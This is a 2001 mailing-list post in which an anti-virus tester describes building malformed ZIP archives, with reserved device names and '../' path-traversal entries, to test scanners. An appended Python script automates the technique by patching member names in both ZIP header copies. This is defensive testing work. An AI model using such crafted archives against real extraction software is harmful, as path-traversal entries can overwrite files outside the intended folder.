OSEC

From: Andreas Marx (amarxgega-it.de)
Date: Fri Aug 03 2001 - 06:43:06 CDT


    Hi!

    >It's nice to hear that from you. I just want to know what methods
    >and tools your team uses for testing the anti-virus products.
    >If you can send them to me, I would be very thankful.

    We, the Anti-Virus Test Team at the University of Magdeburg (
    http://www.av-test.org ), did it the following way (I don't want to be too
    exact, because of the script kiddies, sorry):

    First we created normal archives using a standard archiver (and normal
    file names like "xul.exe"), but after the archive was created, we
    edited the files internally using a hex editor (change "x" to "n" - but be
    careful, in ZIP files the file name is included twice). You cannot add
    names like "nul.exe" to an archive, of course, but you can change the name
    inside the archive easily, as long as the length of the name stays the
    same. You can do this both for "nul.exe" and for additional "../"s in
    paths like "../../test.exe". (Btw, we used the Volkov Commander (DOS),
    not a "real" hex editor. :) )

    The second step was to test the anti-virus and anti-trojan programs. This was
    relatively simple, because a few days ago we had just finished a bigger
    comparison test for trojaner-info.de, a big German security site (
    http://www.trojaner-info.de/test_07_2001.shtml ), with a special focus on
    trojan horses, backdoors etc. Additional tests were done using a slightly
    older test set from a review we did for the German PC-WELT magazine (
    http://www.pcwelt.de/ratgeber/anwendungen/viren-report/16583/3.html ). We
    can easily restore the originally tested programs including updates, since
    we use Ghost images for all types of tests. (This includes both the
    original test platforms, like "plain Win98", and a Ghost image where the AV
    program was already installed.)

    The main test was relatively simple: simply scan the archives (for each of
    the tests we created at least four test files) and see what happens.
    ;-) After this, we repeated the test to ensure that all results were
    correct.

    I hope this helps to understand the test procedures better.

    cheers,
    Andreas Marx

    NEW: Notes 4/5 + Exchange 5.5/2000 Test -> http://www.av-test.org

    -- 
    Andreas Marx <amarxgega-it.de>, http://www.av-test.de
    GEGA IT-Solutions GbR, Klewitzstr. 7, 39112 Magdeburg, Germany
    Tel: 0391/6075466, Mobil: 0177/6133033, Fax: 0391/6075469
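The in-place renaming Andreas describes, as an added example that is not part of the original post and not the test team's own tooling: it builds a constructed ZIP with harmless names, then walks the central directory and patches each name in both places a ZIP stores it (the local file header before the data and the central directory entry at the end), refusing any replacement whose length differs. The member names, payload bytes and the name mapping are assumptions made for the demonstration.

```python
import io
import struct
import zipfile

# Constructed sample mapping (not the test team's files): each harmless name
# is exactly as long as the name we patch in, so no offsets in the file move.
RENAMES = {
    b"xul.exe": b"nul.exe",               # 7 -> 7: reserved DOS device name
    b"aa/aa/test.exe": b"../../test.exe",  # 14 -> 14: path traversal
}

LOCAL_SIG = b"PK\x03\x04"    # local file header
CENTRAL_SIG = b"PK\x01\x02"  # central directory entry
EOCD_SIG = b"PK\x05\x06"     # end of central directory record


def build_archive(renames=RENAMES):
    """Create a well-formed ZIP with the harmless names via a standard archiver."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name in renames:
            zf.writestr(name.decode(), b"placeholder payload for " + name)
    return buf.getvalue()


def patch_names(data, renames=RENAMES):
    """Rewrite member names in place, touching both copies of each name.

    The new name must have the same length as the old one; otherwise every
    offset stored in the central directory would point into the wrong place.
    """
    for old, new in renames.items():
        if len(old) != len(new):
            raise ValueError(f"{old!r} -> {new!r}: lengths differ")
    buf = bytearray(data)
    # EOCD record: cd_size at +12, cd_offset at +16 (archive comment assumed absent).
    eocd = buf.rfind(EOCD_SIG)
    if eocd < 0:
        raise ValueError("not a ZIP: EOCD record missing")
    cd_size, cd_offset = struct.unpack_from("<II", buf, eocd + 12)
    pos = cd_offset
    while pos < cd_offset + cd_size:
        if buf[pos:pos + 4] != CENTRAL_SIG:
            raise ValueError(f"bad central directory entry at offset {pos}")
        # Central entry: name_len/extra_len/comment_len at +28, local header offset at +42,
        # name starts at +46.
        name_len, extra_len, comment_len = struct.unpack_from("<HHH", buf, pos + 28)
        (local_off,) = struct.unpack_from("<I", buf, pos + 42)
        name = bytes(buf[pos + 46:pos + 46 + name_len])
        if name in renames:
            new = renames[name]
            buf[pos + 46:pos + 46 + name_len] = new  # copy 1: central directory
            if buf[local_off:local_off + 4] != LOCAL_SIG:
                raise ValueError(f"bad local header at offset {local_off}")
            # Local header: name_len at +26, name starts at +30.
            (lname_len,) = struct.unpack_from("<H", buf, local_off + 26)
            if lname_len != name_len:
                raise ValueError("local header and central directory disagree on name length")
            buf[local_off + 30:local_off + 30 + name_len] = new  # copy 2: local header
        pos += 46 + name_len + extra_len + comment_len
    return bytes(buf)


def member_names(data):
    """Names a standard ZIP reader sees; testzip() also proves both copies still agree."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        if zf.testzip() is not None:
            raise ValueError("archive is no longer consistent")
        return zf.namelist()


if __name__ == "__main__":
    original = build_archive()
    patched = patch_names(original)
    print(member_names(original))  # harmless names the archiver wrote
    print(member_names(patched))   # names the scanner now has to handle
```

If only one of the two copies were patched, Python's zipfile (like most readers) rejects the member because the local header name and the central directory name differ; patching both keeps the archive fully valid, which is exactly why a scanner cannot dismiss such files as corrupt.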